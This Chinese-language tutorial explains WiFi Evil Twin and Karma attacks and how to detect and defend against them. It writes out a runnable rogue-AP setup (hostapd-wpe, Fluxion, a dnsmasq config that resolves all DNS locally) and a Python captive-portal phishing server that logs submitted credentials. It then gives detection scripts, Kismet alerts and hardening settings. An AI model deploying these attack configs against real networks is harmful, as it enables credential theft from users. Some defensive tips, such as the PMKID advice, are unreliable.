识别和防御无线网络中的"双胞胎"陷阱
无线攻击利用802.11协议的设计缺陷和无线介质的开放特性,对WiFi网络及其用户发动攻击。与有线网络不同,无线信号在物理空间中广播,任何人在覆盖范围内都可以接收和发送帧。
| 攻击类型 | 难度 | 危害 | 检测难度 |
|---|---|---|---|
| Deauth泛洪 | 低 | 拒绝服务 | 中等 |
| Evil Twin | 中 | 凭证窃取/MITM | 高 |
| Karma攻击 | 中 | 自动连接劫持 | 高 |
| 无线钓鱼 | 中 | 凭证窃取 | 中等 |
| 信道劫持 | 高 | 完全控制 | 极高 |
Evil Twin(邪恶双胞胎)是一种创建恶意AP伪装成合法AP的攻击。用户设备会自动连接到信号更强的同名AP,攻击者从而实现中间人攻击或凭证窃取。
# 安装hostapd-wpe (Wireless Pwnage Edition)
git clone https://github.com/OpenSecurityResearch/hostapd-wpe.git
cd hostapd-wpe
apt install libssl-dev libnl-3-dev libnl-genl-3-dev
make
# 配置恶意AP
cat > evil_twin.conf << 'EOF'
interface=wlan0mon
driver=nl80211
ssid=CoffeeShop
hw_mode=g
channel=6
auth_algs=1
wpa=2
wpa_passphrase=Welcome2024
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
# 启动恶意AP
./hostapd-wpe evil_twin.conf
# Fluxion - 自动化Evil Twin攻击框架
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
sudo ./fluxion.sh
# Fluxion自动执行:
# 1. 扫描目标WiFi
# 2. 捕获握手包
# 3. 启动伪造AP(同ESSID)
# 4. 发送Deauth断开原客户端
# 5. 启动伪造 captive portal
# 6. 等待用户输入密码
# 7. 验证密码正确性
# 配置dnsmasq为DNS+DHCP
cat > dnsmasq.conf << 'EOF'
interface=wlan0
dhcp-range=192.168.1.100,192.168.1.200,12h
address=/#/192.168.1.1 # 所有域名解析到本机
log-queries # 记录所有DNS查询
EOF
dnsmasq -C dnsmasq.conf
# 启动钓鱼Web服务器
cat > phishing.py << 'EOF'
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class PhishHandler(BaseHTTPRequestHandler):
def do_GET(self):
# 返回伪造的登录页面
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
html = open('captive_portal.html').read()
self.wfile.write(html.encode())
def do_POST(self):
# 捕获用户提交的凭证
length = int(self.headers['Content-Length'])
data = self.rfile.read(length).decode()
print(f"[!] 捕获凭证: {data}")
# 保存凭证
with open('captured_creds.txt', 'a') as f:
f.write(data + '\n')
# 重定向到真实页面
self.send_response(302)
self.send_header('Location', 'https://www.google.com')
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 80), PhishHandler)
httpd.serve_forever()
EOF
python3 phishing.py
检测Evil Twin是蓝队的核心技能。以下是多层检测策略:
# 使用airodump-ng检测同SSID多BSSID
sudo airodump-ng wlan0mon
# 输出:
# BSSID CH ENC ESSID PWR
# AA:BB:CC:DD:EE:FF 6 WPA2 CoffeeShop -42
# AA:BB:CC:DD:EE:77 6 WPA2 CoffeeShop -55 ← 可疑!
# ↑ 同信道同SSID但不同BSSID
# OUI查询验证
# AA:BB:CC → 查询 https://macvendors.com
# 如果一个显示 TP-Link,另一个显示 Alfa → 极可能是Evil Twin
# Python检测脚本 - 信号强度异常
#!/usr/bin/env python3
"""Evil Twin信号强度异常检测"""
import subprocess
import re
from collections import defaultdict
def scan_wifi(interface='wlan0'):
"""扫描WiFi并按SSID分组"""
result = subprocess.run(
['sudo', 'iwlist', interface, 'scan'],
capture_output=True, text=True
)
networks = []
current = {}
for line in result.stdout.split('\n'):
if 'Cell' in line:
if current:
networks.append(current)
current = {}
current['bssid'] = re.search(r'Address: (.+)', line).group(1).strip()
elif 'ESSID' in line:
current['ssid'] = re.search(r'ESSID:"(.+)"', line).group(1)
elif 'Quality' in line:
match = re.search(r'Signal level=(-\d+)', line)
if match:
current['signal'] = int(match.group(1))
elif 'Channel' in line:
match = re.search(r'Channel:(\d+)', line)
if match:
current['channel'] = int(match.group(1))
if current:
networks.append(current)
return networks
def detect_evil_twin(networks):
"""检测可能的Evil Twin"""
ssid_groups = defaultdict(list)
for net in networks:
if 'ssid' in net:
ssid_groups[net['ssid']].append(net)
alerts = []
for ssid, aps in ssid_groups.items():
if len(aps) > 1:
channels = set(ap.get('channel') for ap in aps)
bssids = [ap.get('bssid') for ap in aps]
signals = [ap.get('signal', 0) for ap in aps]
# 检测:同SSID + 不同BSSID
alert = f"⚠️ Evil Twin嫌疑: SSID='{ssid}'\n"
alert += f" 发现 {len(aps)} 个AP:\n"
for ap in aps:
alert += f" - BSSID: {ap['bssid']} "
alert += f"CH: {ap.get('channel','?')} "
alert += f"Signal: {ap.get('signal','?')}dBm\n"
# 信号差异过大
if max(signals) - min(signals) > 20:
alert += " ⚠️ 信号差异 > 20dBm,高度可疑!\n"
alerts.append(alert)
return alerts
# 运行检测
networks = scan_wifi()
alerts = detect_evil_twin(networks)
for alert in alerts:
print(alert)
# 使用Kismet作为WIDS
sudo apt install kismet
sudo kismet
# Kismet自动检测:
# - 未知AP (未在白名单中)
# - 同SSID多AP (Evil Twin指标)
# - 信道变化异常
# - BSSID与OUI不匹配
# - Deauth帧异常
# 配置告警
# kismet.conf
alert=AP_SSID_MISMATCH # SSID与已知不匹配
alert=AP_BSSID_MISMATCH # BSSID变更
alert=AP_CHANNEL_CHANGE # 信道异常变化
alert=DEAUTH_FLOOD # Deauth泛洪
# WPA2-Enterprise环境下,检查RADIUS证书
# 合法AP: 服务器证书由受信任CA签发
# Evil Twin: 自签名证书或不受信任CA
# 802.1X客户端配置验证
cat /etc/NetworkManager/system-connections/enterprise-wifi.nmconnection
[802-1x]
eap=peap
identity=user@company.com
ca-cert=/etc/ssl/certs/company-ca.pem # ← 验证CA证书
phase2-auth=mschapv2
# 使用certmgr检查证书链
openssl s_client -connect radius.company.com:1812 \
-CAfile /etc/ssl/certs/company-ca.pem \
-verify_return_error
# 1. 无线控制器(WLC)配置
# Cisco WLC Rogue AP检测
config wps ap-authentication enable
config wps ap-authentication threshold 3 # 3个探测帧验证
# 2. 802.1X + 证书验证
# 防止Evil Twin: 客户端验证AP的RADIUS证书
# WPA2-Enterprise + EAP-TLS (双向证书认证)
# 3. 无线防火墙策略
# iptables规则限制无线网段
iptables -A FORWARD -i wlan0 -o eth0 -m state \
--state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i wlan0 -o eth0 -j DROP
# 无线网段只能访问特定服务
# Windows: 组策略禁用自动连接
# Computer Configuration → Policies → Windows Settings →
# Security Settings → Wireless Network (IEEE 802.11) Policies
# macOS: 使用配置文件
# /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
# RememberRecentNetworks = false # 不记住网络
# RequireAdminForNetworkCreate = true # 需管理员权限
# Linux: NetworkManager配置
[connection]
wifi.autoconnect=false # 禁止自动连接
wifi.powersave=2 # 关闭省电模式(防止频繁重连
[802-1x]
ca-cert=/path/to/ca.pem # 验证服务器证书
system-ca-certs=true # 使用系统CA库
# 使用pyrit进行PMKID攻击检测
# PMKID攻击不需要客户端在线即可获取握手
sudo apt install pyrit
# 检测PMKID暴露
pyrit analyze capture.cap
# 如果输出包含 "PMKID detected" → AP存在漏洞
# 防御PMKID:
# 路由器关闭 "Robust Secure Network" 或更新固件
Karma攻击利用了客户端的"主动探测"行为:客户端定期发送Probe Request包含已知SSID,攻击者对所有Probe Request都回复Probe Response,诱骗客户端连接。
# Karma攻击工具
# 1. hostapd-karma
git clone https://github.com/n1cr4ck/hostapd-mana.git
cd hostapd-mana
# mana = hostapd + karma + other attacks
# 2. 配置
cat > mana.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=Anything # 会被karma覆盖
hw_mode=g
channel=6
karma_enable=1 # 启用Karma
EOF
# 3. 现代防御: 大多数OS已禁用主动探测
# Windows 10+: 仅对已知网络发送定向探测
# macOS: 默认不发送广播探测
# Android 10+: 限制随机MAC探测
# FragAttacks - 802.11帧分片漏洞
# Mathy Vanhoef发现,影响所有WiFi设备
# 三类漏洞:
# 1. 帧注入: 在受保护网络中注入任意帧
# 2. 混合密钥: 不同密钥的帧分片混合拼接
# 3. 缓存队列: 未清空的分片缓存导致数据泄露
# 检测工具
git clone https://github.com/vanhoefm/frag-attacks.git
cd frag-attacks
# 需要修改版ath9k_htc驱动
# 防御: 更新设备固件/驱动
# Linux: kernel >= 5.12 已修复
# Windows: 2021年6月补丁已修复